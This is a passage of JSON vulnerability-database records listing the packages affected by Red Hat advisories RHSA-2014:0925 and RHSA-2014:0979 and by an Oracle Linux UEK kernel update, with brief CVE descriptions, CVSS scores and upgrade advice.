"lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "s390x", "packageFilename": "python-perf-debuginfo-2.6.32-358.46.2.el6.s390x.rpm", "packageName": "python-perf-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "x86_64", "packageFilename": "perf-2.6.32-358.46.2.el6.x86_64.rpm", "packageName": "perf", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "i686", "packageFilename": "kernel-debug-debuginfo-2.6.32-358.46.2.el6.i686.rpm", "packageName": "kernel-debug-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "x86_64", "packageFilename": "kernel-debuginfo-2.6.32-358.46.2.el6.x86_64.rpm", "packageName": "kernel-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "i686", "packageFilename": "kernel-debug-2.6.32-358.46.2.el6.i686.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "s390x", "packageFilename": "kernel-headers-2.6.32-358.46.2.el6.s390x.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "src", "packageFilename": "kernel-2.6.32-358.46.2.el6.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "s390x", "packageFilename": "perf-2.6.32-358.46.2.el6.s390x.rpm", "packageName": "perf", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "i686", "packageFilename": "perf-debuginfo-2.6.32-358.46.2.el6.i686.rpm", "packageName": "perf-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "s390x", "packageFilename": "kernel-kdump-debuginfo-2.6.32-358.46.2.el6.s390x.rpm", "packageName": "kernel-kdump-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "noarch", "packageFilename": "kernel-firmware-2.6.32-358.46.2.el6.noarch.rpm", "packageName": "kernel-firmware", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "x86_64", "packageFilename": "kernel-debug-2.6.32-358.46.2.el6.x86_64.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "ppc64", "packageFilename": "python-perf-2.6.32-358.46.2.el6.ppc64.rpm", "packageName": "python-perf", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "i686", "packageFilename": "kernel-2.6.32-358.46.2.el6.i686.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "i686", "packageFilename": "kernel-devel-2.6.32-358.46.2.el6.i686.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "i686", "packageFilename": "kernel-headers-2.6.32-358.46.2.el6.i686.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "i686", "packageFilename": "python-perf-debuginfo-2.6.32-358.46.2.el6.i686.rpm", "packageName": "python-perf-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "x86_64", "packageFilename": "perf-debuginfo-2.6.32-358.46.2.el6.x86_64.rpm", "packageName": "perf-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "s390x", "packageFilename": "perf-debuginfo-2.6.32-358.46.2.el6.s390x.rpm", "packageName": "perf-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "x86_64", "packageFilename": "kernel-debug-devel-2.6.32-358.46.2.el6.x86_64.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "s390x", "packageFilename": "kernel-debuginfo-2.6.32-358.46.2.el6.s390x.rpm", "packageName": "kernel-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "s390x", "packageFilename": "kernel-debug-devel-2.6.32-358.46.2.el6.s390x.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "ppc64", "packageFilename": "kernel-headers-2.6.32-358.46.2.el6.ppc64.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "s390x", "packageFilename": "kernel-kdump-2.6.32-358.46.2.el6.s390x.rpm", "packageName": "kernel-kdump", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "ppc64", "packageFilename": "kernel-devel-2.6.32-358.46.2.el6.ppc64.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "s390x", "packageFilename": "python-perf-2.6.32-358.46.2.el6.s390x.rpm", "packageName": "python-perf", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "x86_64", "packageFilename": "kernel-2.6.32-358.46.2.el6.x86_64.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "ppc64", "packageFilename": "perf-debuginfo-2.6.32-358.46.2.el6.ppc64.rpm", "packageName": "perf-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "ppc64", "packageFilename": "kernel-debug-debuginfo-2.6.32-358.46.2.el6.ppc64.rpm", "packageName": "kernel-debug-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "i686", "packageFilename": "kernel-debuginfo-common-i686-2.6.32-358.46.2.el6.i686.rpm", "packageName": "kernel-debuginfo-common-i686", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "ppc64", "packageFilename": "kernel-debug-2.6.32-358.46.2.el6.ppc64.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "i686", "packageFilename": "kernel-debug-devel-2.6.32-358.46.2.el6.i686.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "x86_64", "packageFilename": "python-perf-debuginfo-2.6.32-358.46.2.el6.x86_64.rpm", "packageName": "python-perf-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "x86_64", "packageFilename": "kernel-headers-2.6.32-358.46.2.el6.x86_64.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "s390x", "packageFilename": "kernel-devel-2.6.32-358.46.2.el6.s390x.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "s390x", "packageFilename": "kernel-kdump-devel-2.6.32-358.46.2.el6.s390x.rpm", "packageName": "kernel-kdump-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "i686", "packageFilename": "kernel-debuginfo-2.6.32-358.46.2.el6.i686.rpm", "packageName": "kernel-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "s390x", "packageFilename": "kernel-2.6.32-358.46.2.el6.s390x.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "x86_64", "packageFilename": "kernel-debug-debuginfo-2.6.32-358.46.2.el6.x86_64.rpm", "packageName": "kernel-debug-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "ppc64", "packageFilename": "kernel-bootwrapper-2.6.32-358.46.2.el6.ppc64.rpm", "packageName": "kernel-bootwrapper", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "ppc64", "packageFilename": "perf-2.6.32-358.46.2.el6.ppc64.rpm", "packageName": "perf", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "s390x", "packageFilename": "kernel-debuginfo-common-s390x-2.6.32-358.46.2.el6.s390x.rpm", "packageName": "kernel-debuginfo-common-s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "s390x", "packageFilename": "kernel-debug-2.6.32-358.46.2.el6.s390x.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "x86_64", "packageFilename": "python-perf-2.6.32-358.46.2.el6.x86_64.rpm", "packageName": "python-perf", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "ppc64", "packageFilename": "kernel-debuginfo-common-ppc64-2.6.32-358.46.2.el6.ppc64.rpm", "packageName": "kernel-debuginfo-common-ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "i686", "packageFilename": "python-perf-2.6.32-358.46.2.el6.i686.rpm", "packageName": "python-perf", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "ppc64", "packageFilename": "kernel-debuginfo-2.6.32-358.46.2.el6.ppc64.rpm", "packageName": "kernel-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "i686", "packageFilename": "perf-2.6.32-358.46.2.el6.i686.rpm", "packageName": "perf", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "x86_64", "packageFilename": "kernel-debuginfo-common-x86_64-2.6.32-358.46.2.el6.x86_64.rpm", "packageName": "kernel-debuginfo-common-x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "ppc64", "packageFilename": "python-perf-debuginfo-2.6.32-358.46.2.el6.ppc64.rpm", "packageName": "python-perf-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "noarch", "packageFilename": "kernel-doc-2.6.32-358.46.2.el6.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "x86_64", "packageFilename": "kernel-devel-2.6.32-358.46.2.el6.x86_64.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "ppc64", "packageFilename": "kernel-debug-devel-2.6.32-358.46.2.el6.ppc64.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's ptrace subsystem allowed a traced\nprocess' instruction pointer to be set to a non-canonical memory address\nwithout forcing the non-sysret code path when returning to user space.\nA local, unprivileged user could use this flaw to crash the system or,\npotentially, escalate their privileges on the system. (CVE-2014-4699,\nImportant)\n\nNote: The CVE-2014-4699 issue only affected systems using an Intel CPU.\n\n* A flaw was found in the way the pppol2tp_setsockopt() and\npppol2tp_getsockopt() functions in the Linux kernel's PPP over L2TP\nimplementation handled requests with a non-SOL_PPPOL2TP socket option\nlevel. A local, unprivileged user could use this flaw to escalate their\nprivileges on the system. (CVE-2014-4943, Important)\n\nRed Hat would like to thank Andy Lutomirski for reporting CVE-2014-4699,\nand Sasha Levin for reporting CVE-2014-4943.\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. The system must be\nrebooted for this update to take effect.\n", "reporter": "RedHat", "published": "2014-07-23T04:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "redhat", "title": "(RHSA-2014:0925) Important: kernel security update", "bulletinFamily": "unix", "cvelist": ["CVE-2014-4699", "CVE-2014-4943"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2015-04-24T14:20:56", "id": "RHSA-2014:0925", "href": "https://access.redhat.com/errata/RHSA-2014:0925", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-06-12T23:59:33", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "6.5-20140725.0.el6ev", "arch": "noarch", "packageName": "rhev-hypervisor6", "packageFilename": "rhev-hypervisor6-6.5-20140725.0.el6ev.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "6.5-20140725.0.el6ev", "arch": "src", "packageName": "rhev-hypervisor6", "packageFilename": "rhev-hypervisor6-6.5-20140725.0.el6ev.src.rpm", "operator": "lt"}], "description": "The rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization\nHypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor\nis a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes\neverything necessary to run and manage virtual machines: a subset of the\nRed Hat Enterprise Linux operating environment and the Red Hat Enterprise\nVirtualization Agent.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available for\nthe Intel 64 and AMD64 architectures with virtualization extensions.\n\nIt was found that NSS accepted weak Diffie-Hellman Key exchange (DHKE)\nparameters. This could possibly lead to weak encryption being used in\ncommunication between the client and the server. (CVE-2014-1491)\n\nRed Hat would like to thank the Mozilla project for reporting the\nCVE-2014-1491 issue. Upstream acknowledges Antoine Delignat-Lavaud and\nKarthikeyan Bhargavan as the original reporters of CVE-2014-1491.\n\nThis update includes changes to the rhev-hypervisor component:\n\n* The most recent build of rhev-hypervisor is included in version 3.4.1.\n(BZ#1118298)\n\nThis updated package also provides updated components that include fixes\nfor various security issues. These issues have no security impact on Red\nHat Enterprise Virtualization Hypervisor itself, however. The security\nfixes included in this update address the following CVE numbers:\n\nCVE-2014-4699 and CVE-2014-4943 (kernel issues)\n\nCVE-2014-4607 (lzo issue)\n\nCVE-2013-1740, CVE-2014-1490, CVE-2014-1492, CVE-2014-1545, and\nCVE-2014-1544 (nss and nspr issues)\n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised to\nupgrade to this updated package.\n", "reporter": "RedHat", "published": "2014-07-29T04:00:00", "type": "redhat", "title": "(RHSA-2014:0979) Moderate: rhev-hypervisor6 security and bug fix update", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2013-1740", "CVE-2014-1490", "CVE-2014-1491", "CVE-2014-1492", "CVE-2014-1544", "CVE-2014-1545", "CVE-2014-4607", "CVE-2014-4699", "CVE-2014-4943"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-07T08:59:43", "id": "RHSA-2014:0979", "href": "https://access.redhat.com/errata/RHSA-2014:0979", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2016-09-04T11:16:42", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-400.36.4.el5uek", "arch": "i686", "packageFilename": "kernel-uek-debug-devel-2.6.32-400.36.4.el5uek.i686.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.1-4.0.58", "arch": "x86_64", "packageFilename": "ofa-2.6.32-400.36.4.el6uekdebug-1.5.1-4.0.58.x86_64.rpm", "packageName": "ofa-2.6.32-400.36.4.el6uekdebug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-400.36.4.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-2.6.32-400.36.4.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-400.36.4.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.32-400.36.4.el6uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-400.36.4.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.32-400.36.4.el6uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-400.36.4.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-2.6.32-400.36.4.el5uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.7-2", "arch": "x86_64", "packageFilename": "mlnx_en-2.6.32-400.36.4.el5uekdebug-1.5.7-2.x86_64.rpm", "packageName": "mlnx_en-2.6.32-400.36.4.el5uekdebug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.7-2", "arch": "i686", "packageFilename": "mlnx_en-2.6.32-400.36.4.el5uekdebug-1.5.7-2.i686.rpm", "packageName": "mlnx_en-2.6.32-400.36.4.el5uekdebug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.7-0.1", "arch": "x86_64", "packageFilename": "mlnx_en-2.6.32-400.36.4.el6uekdebug-1.5.7-0.1.x86_64.rpm", "packageName": "mlnx_en-2.6.32-400.36.4.el6uekdebug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-400.36.4.el6uek", "arch": "i686", "packageFilename": "kernel-uek-devel-2.6.32-400.36.4.el6uek.i686.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-400.36.4.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-2.6.32-400.36.4.el5uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.1-4.0.58", "arch": "i686", "packageFilename": "ofa-2.6.32-400.36.4.el6uekdebug-1.5.1-4.0.58.i686.rpm", "packageName": "ofa-2.6.32-400.36.4.el6uekdebug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-400.36.4.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.32-400.36.4.el5uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-400.36.4.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.32-400.36.4.el5uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-400.36.4.el6uek", "arch": "i686", "packageFilename": "kernel-uek-headers-2.6.32-400.36.4.el6uek.i686.rpm", "packageName": "kernel-uek-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-400.36.4.el6uek", "arch": "i686", "packageFilename": "kernel-uek-debug-devel-2.6.32-400.36.4.el6uek.i686.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-400.36.4.el6uek", "arch": "src", "packageFilename": "kernel-uek-2.6.32-400.36.4.el6uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-400.36.4.el6uek", "arch": "src", "packageFilename": "kernel-uek-2.6.32-400.36.4.el6uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-400.36.4.el6uek", "arch": "i686", "packageFilename": "kernel-uek-debug-2.6.32-400.36.4.el6uek.i686.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-400.36.4.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.32-400.36.4.el6uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-400.36.4.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.32-400.36.4.el6uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-400.36.4.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-headers-2.6.32-400.36.4.el6uek.x86_64.rpm", "packageName": "kernel-uek-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-400.36.4.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-2.6.32-400.36.4.el6uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.1-4.0.58", "arch": "src", "packageFilename": "ofa-2.6.32-400.36.4.el6uek-1.5.1-4.0.58.src.rpm", "packageName": "ofa-2.6.32-400.36.4.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.1-4.0.58", "arch": "src", "packageFilename": "ofa-2.6.32-400.36.4.el6uek-1.5.1-4.0.58.src.rpm", "packageName": "ofa-2.6.32-400.36.4.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.1-4.0.58", "arch": "i686", "packageFilename": "ofa-2.6.32-400.36.4.el5uekdebug-1.5.1-4.0.58.i686.rpm", "packageName": "ofa-2.6.32-400.36.4.el5uekdebug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.1-4.0.58", "arch": "x86_64", "packageFilename": "ofa-2.6.32-400.36.4.el5uek-1.5.1-4.0.58.x86_64.rpm", "packageName": "ofa-2.6.32-400.36.4.el5uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.1-4.0.58", "arch": "i686", "packageFilename": "ofa-2.6.32-400.36.4.el6uek-1.5.1-4.0.58.i686.rpm", "packageName": "ofa-2.6.32-400.36.4.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.7-2", "arch": "x86_64", "packageFilename": "mlnx_en-2.6.32-400.36.4.el5uek-1.5.7-2.x86_64.rpm", "packageName": "mlnx_en-2.6.32-400.36.4.el5uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.1-4.0.58", "arch": "src", "packageFilename": "ofa-2.6.32-400.36.4.el5uek-1.5.1-4.0.58.src.rpm", "packageName": "ofa-2.6.32-400.36.4.el5uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.1-4.0.58", "arch": "src", "packageFilename": "ofa-2.6.32-400.36.4.el5uek-1.5.1-4.0.58.src.rpm", "packageName": "ofa-2.6.32-400.36.4.el5uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-400.36.4.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-headers-2.6.32-400.36.4.el5uek.x86_64.rpm", "packageName": "kernel-uek-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-400.36.4.el6uek", "arch": "i686", "packageFilename": "kernel-uek-2.6.32-400.36.4.el6uek.i686.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-400.36.4.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-2.6.32-400.36.4.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.7-0.1", "arch": "src", "packageFilename": "mlnx_en-2.6.32-400.36.4.el6uek-1.5.7-0.1.src.rpm", "packageName": "mlnx_en-2.6.32-400.36.4.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.7-0.1", "arch": "src", "packageFilename": "mlnx_en-2.6.32-400.36.4.el6uek-1.5.7-0.1.src.rpm", "packageName": "mlnx_en-2.6.32-400.36.4.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-400.36.4.el5uek", "arch": "i686", "packageFilename": "kernel-uek-headers-2.6.32-400.36.4.el5uek.i686.rpm", "packageName": "kernel-uek-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-400.36.4.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-2.6.32-400.36.4.el5uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-400.36.4.el5uek", "arch": "i686", "packageFilename": "kernel-uek-devel-2.6.32-400.36.4.el5uek.i686.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-400.36.4.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.32-400.36.4.el5uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-400.36.4.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.32-400.36.4.el5uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.7-0.1", "arch": "i686", "packageFilename": "mlnx_en-2.6.32-400.36.4.el6uekdebug-1.5.7-0.1.i686.rpm", "packageName": "mlnx_en-2.6.32-400.36.4.el6uekdebug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.1-4.0.58", "arch": "x86_64", "packageFilename": "ofa-2.6.32-400.36.4.el5uekdebug-1.5.1-4.0.58.x86_64.rpm", "packageName": "ofa-2.6.32-400.36.4.el5uekdebug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-400.36.4.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-2.6.32-400.36.4.el5uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.7-2", "arch": "src", "packageFilename": "mlnx_en-2.6.32-400.36.4.el5uek-1.5.7-2.src.rpm", "packageName": "mlnx_en-2.6.32-400.36.4.el5uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.7-2", "arch": "src", "packageFilename": "mlnx_en-2.6.32-400.36.4.el5uek-1.5.7-2.src.rpm", "packageName": "mlnx_en-2.6.32-400.36.4.el5uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.7-0.1", "arch": "x86_64", "packageFilename": "mlnx_en-2.6.32-400.36.4.el6uek-1.5.7-0.1.x86_64.rpm", "packageName": "mlnx_en-2.6.32-400.36.4.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-400.36.4.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-2.6.32-400.36.4.el6uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.7-0.1", "arch": "i686", "packageFilename": "mlnx_en-2.6.32-400.36.4.el6uek-1.5.7-0.1.i686.rpm", "packageName": "mlnx_en-2.6.32-400.36.4.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", 